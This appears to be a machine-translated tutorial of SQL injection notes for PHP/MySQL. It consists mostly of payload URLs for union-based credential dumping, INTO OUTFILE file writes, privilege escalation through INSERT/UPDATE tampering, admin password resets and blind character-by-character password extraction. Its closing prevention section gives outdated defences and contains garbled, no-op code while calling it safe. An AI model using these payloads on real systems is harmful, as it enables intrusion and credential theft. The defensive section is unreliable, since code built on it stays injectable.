SQL injection PHP SQL injection implementation test code security is good

The focus of SQL injection is to construct SQL statements. Only by flexibly using SQL
statements can we construct incredible injection strings. After studying, I wrote some notes and have them ready for use at any time. I hope you will understand the basic principles of SQL first when reading the following content. The code in the notes comes from the Internet.
===Basic part===
Query for this table:
http://127.0.0.1/injection/user.php?username=angel' and LENGTH(password)='6
http://127.0.0.1/ injection/user.php?username=angel' and LEFT(password,1)='m
Union union statement:
http://127.0.0.1/injection/show.php?id=1' union select 1,username, password from user/*
http://127.0.0.1/injection/show.php?id=' union select 1,username,password from user/*
Export file:
http://127.0.0.1/injection/user .php?username=angel' into outfile 'c:/file.txt
http://127.0.0.1/injection/user.php?username=' or 1=1 into outfile 'c:/file.txt
http: //127.0.0.1/injection/show.php?id=' union select 1,username,password from user into outfile 'c:/user.txt
INSERT statement:
INSERT INTO `user` (userid, username, password, homepage, userlevel) VALUES ('', '$username', '$password', '$homepage', '1');
Construct the homepage value as: http://4ngel.net', '3')#
The SQL statement becomes: INSERT INTO `user` (userid, username, password, homepage, userlevel) VALUES ('', 'angel', 'mypass', 'http://4ngel.net', '3')#' , '1');
UPDATE statement: I like this thing
Understand this SQL first
UPDATE user SET password='MD5($password)', homepage='$homepage' WHERE
If this SQL is modified to the following Form, the injection is realized
1: Modify the homepage value to
http://4ngel.net', userlevel='3
Then the SQL statement becomes
UPDATE user SET password='mypass', homepage='http:// 4ngel.net', userlevel='3' WHERE
userlevel is the user level
2: Modify the password value to
mypass)' WHERE username='admin'#
Then the SQL statement becomes
UPDATE user SET password='MD5(mypass )' WHERE username='admin'#)', homepage='$homepage' WHERE
3: Modify the id value to
' OR username='admin'
Then the SQL statement becomes
UPDATE user SET password='MD5($ password)', homepage='$homepage' WHERE OR username='admin'
===Advanced part===
Commonly used MySQL built-in functions
DATABASE()
USER()
SYSTEM_USER()
SESSION_USER()
CURRENT_USER ()
database()
version()
SUBSTRING()
MID()
char()
load_file()
……
Function application
UPDATE article SET title=DATABASE() WHERE id=1
http:// 127.0.0.1/injection/show.php?id=-1 union select 1,database(),version()
SELECT * FROM user WHERE username=char(97,110,103,101,108)
# char(97,110,103,101,108) Equivalent to angel, decimal
http ://127.0.0.1/injection/user.php?userid=1 and password=char(109,121,112,97,115,115)http://127.0.0.1/injection/user.php?userid=1 and LEFT(password,1)> ;char(100)
http://127.0.0.1/injection/user.php?userid=1 and ord(mid(password,3,1))>111
Determine the number and type of fields in the data structure
http ://127.0.0.1/injection/show.php?id=-1 union select 1,1,1
http://127.0.0.1/injection/show.php?id=-1 union select char(97), char(97),char(97)
Guess the data table name
http://127.0.0.1/injection/show.php?id=-1 union select 1,1,1 from members
Cross-table query to get user name and password
http://127.0.0.1/ymdown/show.php?id=10000 union select 1,username,1,password,1,1,1,1,1,1,1,1,1,1,1, 1,1,1,1 from ymdown_user where id=1
Others
#Verify the first password
http://127.0.0.1/ymdown/show.php?id=10 union select 1,1,1,1, 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,1,1))=49
===Injection Prevention===
Server aspect
magic_quotes_gpc is set to On
display_errors is set to Off
Encoding aspect
$keywords = addslashes($keywords);
$keywords = str_replace("_","_",$keywords ; Inject
if (get_magic_quotes_gpc()) {
//....
}else{
$str = mysql_real_escape_string($str);
$keywords = str_replace("_","_",$keywords);
$ keywords = str_replace("%","%",$keywords);
}
Useful functions
stripslashes()
get_magic_quotes_gpc()
mysql_real_escape_string()
strip_tags()
array_map()
addslashes()
Reference article :
http://www.4ngel.net/article/36.htm (SQL Injection with MySQL)中文
http://www.phpe.net/mysql_manual/06-4.html (MYSQL statement reference)
The above introduces SQL injection. PHP's SQL injection implementation test code is very safe, including the content of SQL injection. I hope it will be helpful to friends who are interested in PHP tutorials.